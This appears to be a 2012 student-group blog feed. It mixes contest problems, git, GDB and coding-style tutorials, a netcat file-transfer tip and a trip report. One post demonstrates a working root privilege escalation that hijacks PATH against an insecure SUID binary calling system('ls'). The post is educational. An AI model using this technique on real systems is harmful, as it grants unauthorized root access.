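In the model, the ordinary run picks ./librandom.so, while the setuid run falls back to /usr/lib/librandom.so, which is what the two outputs above show.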
Here is a related article that explains why LD_LIBRARY_PATH exists but also why it’s evil.
22 April 2012 09:00 PM
21 April 2012
Problem 11 of the contest appears earlier than announced in the rules, just so that the average comes out right :P It is fairly easy and should be solved fairly quickly. It is also about the last of its kind, or the first :P
The idea is simple. You are asked to simulate a cellular automaton described by Stephen Wolfram up to a certain iteration and, from the row obtained there, to extract all patterns of a given length that occur at least a given number of times.
As input, you will receive a set of 4 numbers as command-line arguments.
The first of them specifies the rule according to which you must build the automaton (Wolfram Code). For example, 30 translates into exactly the rule from the title. The rule says what color a cell will have in the next iteration, based on the current colors of the cells in a neighborhood of the current cell.
The neighborhood is fixed at 1 for the current stage. One of the following stages will lift this restriction. You can take advantage of this when writing your code.
The second number specifies the iteration you must reach. Simulate the automaton up to that point. Note that this number can be at most 1024 for this problem, but this restriction will also be lifted in the future.
The third number specifies the pattern length (at most 10 for this stage), and the last one specifies the minimum number of occurrences (positive, at most 5 for this stage).
An example command line is:
execname 30 10 3 3
This means identifying all patterns of length 3 that occur at least 3 times in the 10th iteration of an automaton evolving according to rule 30. That is, line 10 of the following image (the starting line, the one with a single square, is 0; the line we are referring to begins with NNAANA and ends with NNAAN).

As output, print each pattern on its own line: first the pattern itself (N for black, A for white) and then the list of coordinates of its starting positions, with the origin given by the position of the cell on the first line. In our case, you will print:
NNA -10 3 6
NAA -9 -6 7
AAN -8 -3 8
The patterns can be printed in any order.
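The example can be reproduced with a short simulation. The Python sketch below makes a few assumptions of its own: the neighborhood is 1, the simulated row covers only the cells the single starting cell can influence, everything outside is treated as white (which holds for rules such as 30 that map three white cells to white), and overlapping occurrences are counted. The function names are made up for the illustration.

```python
from collections import defaultdict


def simulate(rule, iterations):
    """Return the row reached after `iterations` steps, as a list of 0/1 cells."""
    width = 2 * iterations + 1       # cells the starting cell can influence
    cells = [0] * width
    cells[iterations] = 1            # single black cell at coordinate 0
    for _ in range(iterations):
        padded = [0] + cells + [0]   # assumption: the outside stays white
        cells = [
            # The 3-cell neighborhood selects one bit of the Wolfram code.
            (rule >> (padded[i] << 2 | padded[i + 1] << 1 | padded[i + 2])) & 1
            for i in range(width)
        ]
    return cells


def find_patterns(rule, iterations, length, min_count):
    """Map each frequent pattern to the coordinates where it starts."""
    row = "".join("N" if cell else "A" for cell in simulate(rule, iterations))
    starts = defaultdict(list)
    for i in range(len(row) - length + 1):
        starts[row[i:i + length]].append(i - iterations)
    return {pattern: positions for pattern, positions in starts.items()
            if len(positions) >= min_count}


if __name__ == "__main__":
    for pattern, positions in find_patterns(30, 10, 3, 3).items():
        print(pattern, *positions)
```

For the arguments 30 10 3 3 this yields the three patterns listed above, with the same coordinates.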
The running-time limit is given by a formula that depends on the number of the iteration in which you must search for the pattern.
The weight is 2.0.
Good luck.
PS: As a bit of history, in my second year of university I was reading ANKS. Even back then I was fascinated by the pattern in the last picture at the end of the rule's article. Yesterday I was reminded of it while testing things related to the patterns from Boltz. :P

by Mithrandir on 21 April 2012 02:15 PM
20 April 2012
If you didn’t read the techblog Git Tips and Good Practices article yet, you should, as it offers tips every git user should know, together with some very useful references.
When using git for the first time, one has to specify his name and email, so git can associate the commit with who committed it:
$ git config --global user.name "Firstname Lastname"
$ git config --global user.email "your_email@youremail.com"
This adds the information to ~/.gitconfig, a global configuration file that git uses. Also, every git project has its own .git/config file (similar to the global one), and any option set in that file overrides the corresponding option from the global file.
andrei@sherlock:~$ cat ~/.gitconfig
[user]
name = Andrei Petre # filled by the
email = p31andrei@gmail.com # above commands
[color]
ui = auto
pager = true
[core]
editor = vim
[github]
user = andreip
token = ...
[alias]
co = checkout
ci = commit
st = status
br = branch
df = diff
pa = add --patch
rlog = reflog # useful for lost SHA's
type = cat-file -t
dump = cat-file -p
hist = log --pretty=format:\"%h %ad | %s%d [%an]\" --graph --date=short
lg = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --date=relative
Most of these settings are self-explanatory. The part I find most useful, and what this article is really about (it just needed an intro), is the last two aliases.
git lg (from Andrei Maxim) is also a short, prettily formatted version of git log.
Use the one you like best and speed up your workflow.
20 April 2012 09:00 PM
07 April 2012
Problem 9 of the contest arrives ahead of schedule, as compensation for the delays of the others. It is inspired by a comic I saw today (yes, I gave up 9gag, but I read others) and it is fairly simple.
We reduce the game to a single-player game to keep it simple and to fit the contest theme. You are given a grid of n × m cells in which the numbers 1 to n·m must be written, each exactly once. Assume Mike has already filled in some of the cells. Randall has to fill in the rest so that there is a path from the top row to the bottom row passing only through the cells holding the maximum value of their row.
A path can only go through cells that share at least one corner.
As input you will receive a file name as a command line argument. The file contains numbers and the ? character for empty cells. All numbers are right-aligned. For example:
1 2 3 ?
11 10 4 ?
? ? ? 8
As output, print the same grid to stdout with all numbers filled in. A solution is valid only if a path from top to bottom exists. For example, you will print
1 2 3 5
11 10 4 12
7 6 9 8
with the path 5 - 12 - 9. Note that the numbers are right-aligned in the output as well and that there are no stray spaces (so do not print 2-digit numbers with %5d, for example).
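A small Python sketch of how a filled grid could be checked, offered as an illustration and not as the official checker. It assumes that "sharing at least one corner" means the row maxima of two consecutive rows sit in columns that differ by at most one; the function names are hypothetical.

```python
def has_max_path(grid):
    """True if the maxima of consecutive rows are in touching cells."""
    columns = [row.index(max(row)) for row in grid]
    return all(abs(a - b) <= 1 for a, b in zip(columns, columns[1:]))


def is_valid_solution(grid):
    """True if the grid uses 1..n*m exactly once and has a top-to-bottom path."""
    values = sorted(value for row in grid for value in row)
    return values == list(range(1, len(values) + 1)) and has_max_path(grid)


example = [
    [1, 2, 3, 5],
    [11, 10, 4, 12],
    [7, 6, 9, 8],
]
print(is_valid_solution(example))
```

A solver could use the same check in reverse: pick a column for each row's maximum first, then distribute the remaining numbers so that each chosen cell stays the largest on its row.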
There are 10 tests, each passed test being worth 10 points. Each grid that is filled in correctly but offers no path from the first row to the last gets only 2 points.
Running time for each test: 1s.
The weight is 1.8. A little more and we will reach problems worth twice the first one (but that one will soon no longer be solvable, see the rules).
Good luck.

by Mithrandir on 07 April 2012 07:01 PM
02 April 2012
The GNU Debugger (GDB) is a very useful debugging tool, widely used in the C environment.
Workflow
GDB can be run in two distinct ways:
- using the gdb command
- using a core file, usually generated after a serious error
Let’s have a look at the former one on a simple program:
int random() {
int r = 4;
return r;
}
int main() {
char *no_addr = 0;
*no_addr = random();
return 0;
}
The -g compiler option adds debugging information to the executable (here a.out) for use by GDB. The code above segfaults when run, so we run it again under gdb:
$ gcc -Wall -g random.c
$ gdb a.out
[...]
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x080483c5 in main () at random.c:7
7 *no_addr = random();
This helps a lot: it even shows the line causing the problem. Now we'll create a core file to show how the second way works, too. Note that a # at the beginning of a line means the command is run as root:
# ulimit -c 4 # set core file size to 4 blocks
# ./a.out
Segmentation fault (core dumped)
# gdb ./a.out core
Core was generated by `./a.out'.
Program terminated with signal 11, Segmentation fault.
#0 0x080483cd in main () at random.c:7
7 *no_addr = random();
Useful commands
Let’s see a common workflow, while using GDB:
$ gdb a.out # run with gdb debugger
(gdb) break main # set up breakpoint at main() function
Breakpoint 1 at 0x80483bc: file random.c, line 6.
# this suspends the program
# can also receive file name (break random.c:3)
# or address (break *0x080483c5)
(gdb) run # .. just run the thing
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random.c:6 # it stops at first breakpoint
6 char *no_addr = 0;
(gdb) next # execute next line, doesn't enter functions
7 *no_addr = random();
(gdb) step # like next, but enters functions
random () at random.c:2
2 int r = 4;
(gdb) next
3 return r;
(gdb) print r # print values in decimal
$1 = 4
(gdb) print /x # hexa
$2 = 0x4
(gdb) print /o # octal
$3 = 04
(gdb) print &r
$4 = (int *) 0xbfffef5c
(gdb) list # list source code
1 int random() {
2 int r = 4;
3 return r;
4 }
5 int main() {
6 char *no_addr = 0;
7 int r = random();
8 *no_addr = r;
9 return 0;
10 }
(gdb) break 8 # add breakpoint at line 8
Breakpoint 2 at 0x80483cb: file random.c, line 8.
(gdb) continue # continue to next breakpoint
Continuing.
Breakpoint 2, main () at random.c:8
8 *no_addr = r;
(gdb) next
Program received signal SIGSEGV, Segmentation fault.
0x080483d3 in main () at random.c:8
8 *no_addr = r;
(gdb) backtrace # print stack backtrace; show trace of where you are
# which functions you're in
#0 0x080483d3 in main () at random.c:8
(gdb) quit
Another thing you may find useful is having the value of an expression printed automatically every time the program stops. You can do that with display expression. Take this sample code:
int main() {
int i, j = 0;
for (i = 0; i < 10; i++)
j += i * 10;
return 0;
}
And run it in gdb:
(gdb) break main
Breakpoint 1 at 0x804839a: file random2.c, line 2.
(gdb) run
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random2.c:2
2 int i, j = 0;
(gdb) next
3 for (i = 0; i < 10; i++)
(gdb) next
4 j += i * 10;
(gdb) display i
1: i = 0
(gdb) display j
2: j = 0
(gdb) break 4 if i == 8
Breakpoint 2 at 0x80483aa: file random2.c, line 4.
(gdb) continue
Continuing.
Breakpoint 2, main () at random2.c:4
4 j += i * 10;
2: j = 280
1: i = 8
This way you can see how your variables' values change. To delete a display, use the number associated with it:
(gdb) delete display 2
(gdb) next
4 j += i * 10;
1: i = 3
One last trick worth mentioning in this initial GDB tutorial is setting up your ~/.gdbinit file. When GDB starts up, it looks for a file in the current user’s home directory called .gdbinit; this file is used for simple configuration commands. The format is the following:
define <command>
<code>
end
document <command>
<help text>
end
A simple example of .gdbinit:
andrei@sherlock:~$ cat .gdbinit
define cls
shell clear
end
document cls
Clears the screen with a simple command.
end
define bpl
info breakpoints
end
document bpl
List breakpoints
end
Now you can use cls to clear the screen in gdb, or you can find what breakpoints you’ve set:
(gdb) bpl
Num Type Disp Enb Address What
1 breakpoint keep y 0x0804839a in main at random2.c:2
2 breakpoint keep y 0x080483aa in main at random2.c:4
You can also use a .gdbinit file inside your project's directory to hold commands used only for that project. It is read when gdb starts in that directory, and its settings override those in ~/.gdbinit. You can put in it a few commands to run when gdb starts, such as setting up breakpoints and the expressions used with display.
Using the previous source code, we add the following .gdbinit file in the same directory:
b main
r
disp i
disp j
disp /x i
disp
Now, we can run gdb:
$ gdb -q ./a.out
Reading symbols from /tmp/a.out...done.
Breakpoint 1 at 0x804839a: file 1.c, line 5.
Breakpoint 1, main () at 1.c:5
5 int i, j = 0;
3: /x i = 0x0
2: j = 134513616
1: i = 0
(gdb) n
6 for (i = 0; i < 10; i++)
3: /x i = 0x0
2: j = 0
1: i = 0
(gdb) q
Observe the last disp in the .gdbinit file, used to display all expressions defined up to that point.
If you want to disable reading the .gdbinit files, pass a -n flag to gdb just like we passed -q above to strip the header with version info.
Final notes. CGDB is a curses front-end to GDB that is friendlier and more colourful than plain GDB. Also, try this in GDB (I know this from Andrada):
(gdb) b main
Breakpoint 1 at 0x804839a: file random2.c, line 2.
(gdb) r
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random2.c:2
2 int i, j = 0;
(gdb) - # add dash and enter
For more on GDB, check out this tutorial, 8 gdb tricks you should know.
02 April 2012 09:00 PM
26 March 2012
A new problem for the contest, number 7. Even though it comes late, it will remind you of a classic game.
You are given a rectangular field with a few obstacles on it. You have to build the longest snake that would fill the field in a game of Snake.
As input you will receive the name of a file containing the description in the following format: x means obstacle, . means free ground. For example:
.........
.x...x...
...x....x
.........
....x....
As output, produce the same file with a snake drawn on it. Mark the snake's starting point with #, followed by * for the next cell. After that, draw >, <, ^, v for each cell occupied by the snake, representing the direction in which the next cell lies. For example:
......^>>
.x...x^<v
...x.*>vx
.....#.v>
....x<<<v
equivalent to the following path (positions numbered in hex):
......456
.x...x387
...x.129x
.....0.AB
....xFEDC
There are 10 tests. For each one the length of the snake is computed, and you get a score between 0 and 100 depending on the sum obtained by the participant and the minimum sum.
Running time per test: 5s.
Weight: 1.6
Good luck.

by Mithrandir on 26 March 2012 09:19 PM
Environment variables are sometimes very important when creating new processes. One example is the PATH variable, which decides what executable is run for a command.
The easiest way to exploit PATH is to add the current directory . to the list and shadow common shell commands with something else.
$ cat ./ls
echo P0wn3d
$ ls
file1 file2
$ ./ls
P0wn3d
$ export PATH=.:$PATH
$ ls
P0wn3d
But that only affects the user's own shell and can't harm the system. What if other conditions exist in the system, such as the use of the SUID bit? Normal processes run as the user who executes them, regardless of who owns the executable file (as long as the user running the file is allowed to execute it). If the SUID bit is set on an executable file, any process started from that executable runs as the owner of the file, not as the owner of the shell. Here is an example of a very insecure source that shouldn't be SUID-ed.
#include<stdlib.h>
int main(void)
{
system("ls");
return 0;
}
Let’s assume that the compiled executable from this code is owned by root, SUID-ed and put into /bin with the name ls_root.
$ ls -la /bin/ls_root
-rwsrwsr-x 1 root root 7163 2012-03-21 12:28 /bin/ls_root
What this will enable, for example, is the listing of the /root directory by any user.
$ cd /root
$ ls
ls: cannot open directory .: Permission denied
$ sudo ls
test
$ ls_root
test
The code simply executes the ls command. But what if the ls command isn’t doing what it is supposed to do? Given this setup, as a normal user, we can do the following:
$ ln -s /bin/sh ls
$ echo $$
32655
$ ls
ls ls_root.c
$ ./ls
$ echo $$
32730
$ whoami
alexj
$ exit
$ export PATH=.:$PATH
$ ls_root
# whoami
root
#
The ls_root process runs the ls command through system(), which looks ls up in the directories listed in the PATH variable (normally finding /bin/ls). But if PATH is changed in the current bash process, the executable started for ls becomes something else. Because ls_root runs as root (thanks to the SUID bit), all of its children are root processes too. So if ls now resolves to a shell, that shell runs as root, which gives root access.
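The lookup order is easy to see without touching any SUID binary. The Python sketch below is only an illustration of how a command name resolves under a given PATH; it uses shutil.which from the standard library, and the helper names resolve and make_fake_command are made up here.

```python
import os
import shutil
import stat
import tempfile


def resolve(command, path):
    """Return the executable `command` resolves to when PATH is `path`."""
    return shutil.which(command, path=path)


def make_fake_command(directory, name):
    """Create a harmless executable script called `name` in `directory`."""
    target = os.path.join(directory, name)
    with open(target, "w") as handle:
        handle.write("#!/bin/sh\necho P0wn3d\n")
    os.chmod(target, os.stat(target).st_mode | stat.S_IXUSR)
    return target


with tempfile.TemporaryDirectory() as attacker_dir:
    make_fake_command(attacker_dir, "ls")
    system_path = os.environ.get("PATH", "/bin:/usr/bin")
    # With the normal PATH the system ls wins ...
    print(resolve("ls", system_path))
    # ... but a directory placed in front of PATH shadows it.
    print(resolve("ls", attacker_dir + os.pathsep + system_path))
```

This is why privileged programs are usually written to call other executables by absolute path, or to reset PATH to a known value before running anything.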
The SUID is something that is used in Linux systems (sudo and even ping use it), but these executables are very carefully implemented so that normal users can’t exploit them.
26 March 2012 09:00 PM
25 March 2012
The first presentation in the new series of Tech Talks will focus on Mozilla technologies.
Valentin Goșu will talk to us about Mozilla technologies, the key points of the presentation being:
* add-ons
* Firefox core – how to contribute to core
* boot2gecko – live demos, bugs
So we are expecting as many of you as possible on Thursday, 29 March, at 18:00, in room EG106a.
Be there or be square!
by tinamanea on 25 March 2012 01:35 PM
17 March 2012
A short post with a few organizational details about the 2012 contest.
First, we dropped the advanced track. It will be released as a separate contest somewhat later.
Second, we have settled the prizes for the contest. There will be 3 prizes, for (well) the top 3 contestants. They will consist of books, T-shirts printed with fitting messages and challenging puzzles, much like some of the problems here have been and will be. I am not saying how they are distributed or what exactly they contain because I do not want to spoil everything. You will find out in June.
Until then, don't forget to solve the problems. There are 5 already, fairly diverse: 1, 2, 3, 4, 5. According to the rankings, problem 2 is the easiest. According to me, problem 5 is :P The hardest so far seems to be 1, even though it is simpler than 3.
Good luck :D

by Mithrandir on 17 March 2012 06:17 PM
05 March 2012
Today's problem is a bonus one for a special prize. We need a small bash/python script that parses some content. Read more below.
Basically, we need a script that parses the content at http://rosedu.org/ro/news and turns it into files in Markdown format, one per news article.
The contest starts now and ends Wednesday (7.03.2012) evening at 20:00. Results on Thursday (8.03.2012) evening at 21:00.
The prize: up to 3 beers (or the equivalent in juice, mulled wine, whatever), handed out at any time during this semester starting 10.03.2012.
The prize goes to the script that performs the most efficient conversion, with the fewest errors and bugs. Code quality, indentation, comments and formatting also count.
All submissions will be made public on 9.03.2012 at 22:00.
Example output (for the first article on the first version of the ROSEdu site):
---
layout: base
date: 2008-04-09
author: admin
title: Avem si blog
category: ro
---
Datorita cererilor voastre am activat functia de Blog în cadrul site-ului nostru. Deocamdată sistemul actual nu este la fel de puternic ca WordPress, să spunem, însă el foloseşte acelaşi user cu restul site-ului şi forumul şi permite o integrare mai bună. Apropo, vine şi TinyMCE în curând. Pentru a posta odată ce ai drepturi foloseşte meniul din stânga. So, happy blogging! Sergiu.
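The output side of such a script is the easy part. As a rough Python sketch (it deliberately skips fetching and parsing the news page, and the function name to_jekyll_post and its parameters are invented for this illustration), one article could be rendered like this:

```python
def to_jekyll_post(date, author, title, category, body, layout="base"):
    """Render one article as a Markdown file with the front matter shown above."""
    front_matter = [
        "---",
        f"layout: {layout}",
        f"date: {date}",
        f"author: {author}",
        f"title: {title}",
        f"category: {category}",
        "---",
    ]
    return "\n".join(front_matter) + "\n" + body.strip() + "\n"


print(to_jekyll_post("2008-04-09", "admin", "Avem si blog", "ro",
                     "Datorita cererilor voastre am activat functia de Blog ..."))
```

Titles containing characters such as a colon would need quoting in the front matter; the sketch does not handle that.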
For other outputs, look at the contents of the repo of the upcoming version of the site (Jekyll), especially the _posts part.
Good luck :)
PS: In case of very close scores in CP2012, a submission here may be worth a significant epsilon extra :)

by Mithrandir on 05 March 2012 09:18 AM
27 February 2012
Good programmers know that writing code is more than just… writing code. It's more than writing efficient code… It's also about writing good code with respect to those who are going to read and/or use it. This is especially true in open source communities, where potentially hundreds of people could be looking at your code. You have to write code that can be easily read and used by others. And to do that, you need some sort of standard for writing code. This is where the idea of coding styles comes in.
Every software project has its (hopefully properly defined) coding style. It can depend a lot on the programming language that the project uses. The style can specify the indentation, the variable naming, the use of spaces or the use of curly braces.
For example, the Linux Kernel has its coding style well defined in the Documentation pages. It is based on the Kernighan & Ritchie (K&R) style, the Linux Kernel being written in C. This is a very popular coding style with several projects using it, sometimes considered the de facto coding style for C.
If you want to check whether your code follows the Linux coding style, you can use checkpatch.pl. This script can be found in the scripts directory of the Linux kernel source. It is mainly used for checking patches submitted for Linux, but it can be run on normal C source files using the -f parameter. You need to clone the Linux tree to get the script, and you need to run it from the root of the tree.
Here is an example of badly written code:
1
2 int main(void)···
3 {
4 int i,a;···
5 » »
6 for(i=0;i<10;i++)
7 a=i;
8 //this code is useless
9 if(a=i){
10 return 1;
11 }
12
13 return 0;
14 }·····
Note that the · character would represent a space and » would represent a tab. Spaces would represent… spaces.
And this is what checkpatch would report:
alexj@ixmint ~/linux $ scripts/checkpatch.pl -f bad.c
ERROR: trailing whitespace
#2: FILE: bad.c:2:
+int main(void) $
ERROR: trailing whitespace
#4: FILE: bad.c:4:
+ int i,a; $
WARNING: please, no spaces at the start of a line
#4: FILE: bad.c:4:
+ int i,a; $
ERROR: space required after that ',' (ctx:VxV)
#4: FILE: bad.c:4:
+ int i,a;
^
ERROR: trailing whitespace
#5: FILE: bad.c:5:
+^I^I$
WARNING: please, no spaces at the start of a line
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)$
WARNING: suspect code indent for conditional statements (3, 6)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
+ a=i;
ERROR: spaces required around that '=' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required after that ';' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: spaces required around that '<' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required after that ';' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required before the open parenthesis '('
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
WARNING: please, no spaces at the start of a line
#7: FILE: bad.c:7:
+ a=i;$
ERROR: spaces required around that '=' (ctx:VxV)
#7: FILE: bad.c:7:
+ a=i;
^
WARNING: please, no spaces at the start of a line
#8: FILE: bad.c:8:
+ //this code is useless$
ERROR: do not use C99 // comments
#8: FILE: bad.c:8:
+ //this code is useless
WARNING: please, no spaces at the start of a line
#9: FILE: bad.c:9:
+ if(a=i){$
WARNING: suspect code indent for conditional statements (3, 3)
#9: FILE: bad.c:9:
+ if(a=i){
+ return 1;
ERROR: spaces required around that '=' (ctx:VxV)
#9: FILE: bad.c:9:
+ if(a=i){
^
ERROR: space required before the open brace '{'
#9: FILE: bad.c:9:
+ if(a=i){
ERROR: space required before the open parenthesis '('
#9: FILE: bad.c:9:
+ if(a=i){
ERROR: do not use assignment in if condition
#9: FILE: bad.c:9:
+ if(a=i){
WARNING: braces {} are not necessary for single statement blocks
#9: FILE: bad.c:9:
+ if(a=i){
+ return 1;
+ }
WARNING: please, no spaces at the start of a line
#10: FILE: bad.c:10:
+ return 1;$
WARNING: please, no spaces at the start of a line
#11: FILE: bad.c:11:
+ }$
WARNING: please, no spaces at the start of a line
#13: FILE: bad.c:13:
+ return 0$
ERROR: trailing whitespace
#14: FILE: bad.c:14:
+} $
total: 16 errors, 11 warnings, 14 lines checked
NOTE: whitespace errors detected, you may wish to use scripts/cleanpatch or
scripts/cleanfile
bad.c has style problems, please review.
Most of the errors concern whitespace: space or tab characters that shouldn't be there. Spaces and tabs are hard to spot because they are invisible, so a good tip is to make them visible in your editor. Visually replacing characters does not modify the source (spaces will still be spaces), but they will stand out in your editor so you know to delete them. For example, in vi you can use this (credits to ddvlad for it):
set list listchars=tab:»\ ,trail:·,extends:»,precedes:«
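If you want a quick check outside the editor, the two most frequent complaints in the report above are simple to detect. The Python sketch below is only a toy illustration with a made-up function name; it is not a substitute for checkpatch.pl and knows nothing about the rest of the kernel style.

```python
def check_whitespace(source):
    """Yield (line_number, message) pairs for two common whitespace problems."""
    for number, line in enumerate(source.splitlines(), start=1):
        # Anything removed by rstrip() is invisible whitespace at the end.
        if line != line.rstrip():
            yield number, "trailing whitespace"
        # The kernel style indents with tabs, so a leading space is suspect.
        if line.startswith(" "):
            yield number, "spaces at the start of a line"


sample = "int main(void) \n{\n   int i,a; \n\t\t\n}\n"
for number, message in check_whitespace(sample):
    print(f"line {number}: {message}")
```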
Other warnings come from the fact that indentation was done with 3 spaces instead of tabs, which the Linux style treats as 8 characters wide. Tabs and spaces should be used consistently. For example, in vi you can set the width of a tab with:
:set tabstop=8
There are places where you don’t want spaces, but there are situations where you do want them. You should leave a space after keywords like if or for and around operators like =. Doing this makes the code a lot more readable.
Curly braces should be used, but only when needed. If an if has only one instruction to be executed on the branch, it is pointless to have braces enclosing it. Indentation is enough to mark the instruction.
Comment types are a delicate subject. The classic C specification (C89) only allows /* */ block comments. C99 also allows // one-line comments. Some coding styles (like the Linux coding style) don't allow C99 comments.
This is how the code should look with proper coding style:
1 int main(void)
2 {
3 » int i, a;
4
5 » for (i = 0; i < 10; i++)
6 » » a = i;
7 » /* This code is useless */
8 » if (a == i)
9 » » return 1;
10
11 » return 0;
12 }
Other programming languages have similar coding guidelines. For Python, there is PEP 8, co-authored by the creator of Python himself.
But we should always keep in mind that there is no One True Coding Style. As in all great debates, anyone can argue that one style is better than another. What matters, and what (almost) everybody agrees on, is consistency within a project in the code the community writes.
27 February 2012 10:00 PM
25 February 2012
You are on a (Linux) box and you want to transfer some files to another system. What are some ways to do that?
The first and most obvious way is to copy them over ssh using the scp tool. You can copy to and from the server and you can use the recursive copy to transfer entire directories.
But what if you don’t have proper account access (you can’t reach accounts because of lack of passwords or keys, for example)? Here is a rather hackish solution: nc.
The netcat tool (the nc command) is found on most Linux systems. You can create TCP or UDP servers and clients with just one command. You can use the shell redirection operators to put files into a TCP stream and take the data out of the stream. Here is an example of a copy from a server to a client:
Server:
alexj@ixmint ~ $ md5sum lin.zip
3008726d03363b89bcf743c0fde4d5f8 lin.zip
alexj@ixmint ~ $ cat lin.zip|nc -l 12345
Client:
alexj@hathor /tmp $ nc ixmint.local 12345 >lin.zip
alexj@hathor /tmp $ md5sum lin.zip
3008726d03363b89bcf743c0fde4d5f8 lin.zip
You can transfer an entire directory (or several files) by first packing the content into a compressed archive with tar.
Server:
alexj@ixmint ~ $ tar -czvf - some_folder | nc -l 12345
Client:
alexj@hathor /tmp $ nc ixmint.local 12345 | tar xzvf -
What other, more user-friendly ways are there? HTTP would be good at this, but configuring Apache with vhosts and aliases is quite an overhead. What you can do is start an HTTP server using Python in just one line (of course, you need Python installed):
alexj@ixmint ~ $ python -m SimpleHTTPServer 1234
Serving HTTP on 0.0.0.0 port 1234 ...
The working directory where you ran the command becomes the www root, and any files in that directory are published (as long as the process has permission to read them). You can then use a web browser (Firefox or another GUI client) or a simple wget to access the URL.
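The one-liner above is for Python 2. In Python 3 the module is called http.server, so the equivalent command is python3 -m http.server 1234. If you would rather start the server from a script, here is a minimal sketch; the function name serve_directory is made up, and it binds to 127.0.0.1 by default as a cautious assumption (use 0.0.0.0 to publish on all interfaces, as the command line does).

```python
import functools
import http.server
import threading


def serve_directory(directory, host="127.0.0.1", port=0):
    """Serve `directory` over HTTP in a background thread and return the server.

    Port 0 asks the operating system for any free port; the port actually
    used is available afterwards as server.server_address[1].
    """
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=directory
    )
    server = http.server.ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# Usage (not run here):
#   server = serve_directory("/tmp", host="0.0.0.0", port=1234)
#   ... fetch files from http://<this-host>:1234/ ...
#   server.shutdown(); server.server_close()
```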
Credits to Alex Morega for the tar|nc idea and Vlad Dogaru for the python SimpleHTTPServer idea.
25 February 2012 10:00 PM
11 February 2012
The first problem of the 2012 programming contest is inspired by a simple mathematical game.
It is Chomp. We will stick to the 2D case for the current problem and model it exactly as in the article, using a chocolate bar (bon appétit :P). The idea is simple: you are given a chocolate bar and whoever eats the last square loses the game. When you pick a square to eat, you must also eat all the squares to the right of it and below it.
Mathematically, the problem is equivalent to starting from a sequence of numbers and reducing the numbers in the sequence one move at a time while keeping a monotonicity constraint: at any moment the sequence is decreasing (strictly speaking, non-increasing). The player who is forced into the final position loses.
Game theory classifies every position in a perfect-information game, according to who wins, as either safe (the player about to move loses) or unsafe. Alternatively, positions are called P positions (the player who reached the position, i.e. the previous player, wins) or N positions (the player who moves from the position, i.e. the next player, wins). From a P position only N positions can be reached, while any N position guarantees the existence of a move leading to a P position. Evidently, a single remaining square is a P position, since the player to move has to eat it.
The task is simple: given a list of positions in various games of Chomp, state whether each is a P or an N position.
Each position is specified by its sequence of values and is given on a single line on standard input. For example
2 2 1
3 1 1
2 1
2 2
is a valid input for your program. The output must be the letter P or N, one per line, corresponding to each position received as input.
P
P
P
N
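The P/N rule above translates directly into a memoized search. The Python sketch below is a brute-force illustration that is only practical for small boards, not a solution sized for the contest tests. It assumes each input line lists row lengths from top to bottom, and the function names are hypothetical.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def is_n_position(rows):
    """True if the player to move from `rows` (a non-increasing tuple) wins."""
    if not rows:
        # The previous player ate the last square and lost.
        return True
    for r, length in enumerate(rows):
        for c in range(length):
            # Eating square (r, c) cuts every row from r downwards to length c.
            cut = rows[:r] + tuple(min(x, c) for x in rows[r:])
            nxt = tuple(x for x in cut if x > 0)
            if not is_n_position(nxt):
                return True  # found a move into a P position
    return False


def classify(line):
    """Return 'N' or 'P' for one input line such as '2 2 1'."""
    rows = tuple(int(token) for token in line.split())
    return "N" if is_n_position(rows) else "P"


for line in ["2 2 1", "3 1 1", "2 1", "2 2"]:
    print(classify(line))
```

On the example input it reproduces the expected P, P, P, N.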
There are 100 tests, each with 100 positions. The score of a test is between 0 and 1, depending on how many positions were identified correctly. The final score is the sum of the scores of all tests.
The weight of the problem in the final ranking is 1.
Good luck.
PS: The article here might also be useful.
PPS: As a bit of history, this problem has fascinated me since high school, and I would play with it from time to time. Some mathematicians offer prizes for its harder instances; if it fascinates or attracts you, you can give it a try.

by Mithrandir on 11 February 2012 09:59 PM
10 February 2012
What clings to a wall, but travels all the world?
At the beginning of the week (and on Sunday of the previous week), I went on a trip to Bușteni, organized by ROSEdu and sponsored by IXIA for the students and mentors of the autumn edition of CDL.

(pic from Victor, more to come)
We left from what little snow there was around here, and when we got there, only 2-3 minutes late, the first thing we noticed was the snow. Deep and fine, just right for snowball fights and building.
Once at the villa, we dropped our luggage and moved on to a few hours of snowball fighting in ad-hoc teams. With snowballs of various sizes, some even lifted with both hands. It was fun.
Later we went up to build life-size snowmen. And since the snow allowed it, a few details were added too, sculpted in snow by Slavic :)
Inside, various board games were played. Mafia; charades, with phrases from songs, games and stories (I had to mime the ending of the first episode of Robotzi, the only one I have seen, and I also mimed «in a hole in the ground there lived a hobbit»); Aye, Dark Overlord, in which someone wanted to kill Rigor Mortis :); Catan, 7 Wonders, etc.
Overall, it was awesome. Even though I had to stay immobilized after an accident on the ice and got in my colleagues' way a bit.
PS: The pancakes turned out 140% brilliant :D

by Mithrandir on 10 February 2012 07:49 AM
16 January 2012
On modern Linux distributions, the users have two main possibilities of configuring the network: ifconfig and ip.
The ifconfig tool is part of the net-tools package along side other tools like route, arp and netstat. These are the traditional userspace tools for network configuration, made for older Linux kernels.
iproute2 is the newer package. It comes with the ip tool as a replacement for the ifconfig, route and arp commands, ss as the new netstat, and tc, a new command for traffic control.
There are pros and cons for each of them and there are users (and fans) of each. Let’s see the differences…
First of all, why was iproute2 introduced? There had to be a need for it… The reason was the introduction of the Netlink API, a socket-like interface for accessing kernel information about interfaces, address assignments and routes. Tools like ifconfig used the /proc file hierarchy (procfs) for collecting information. Their output was reformatted data from different network-related files in /proc.
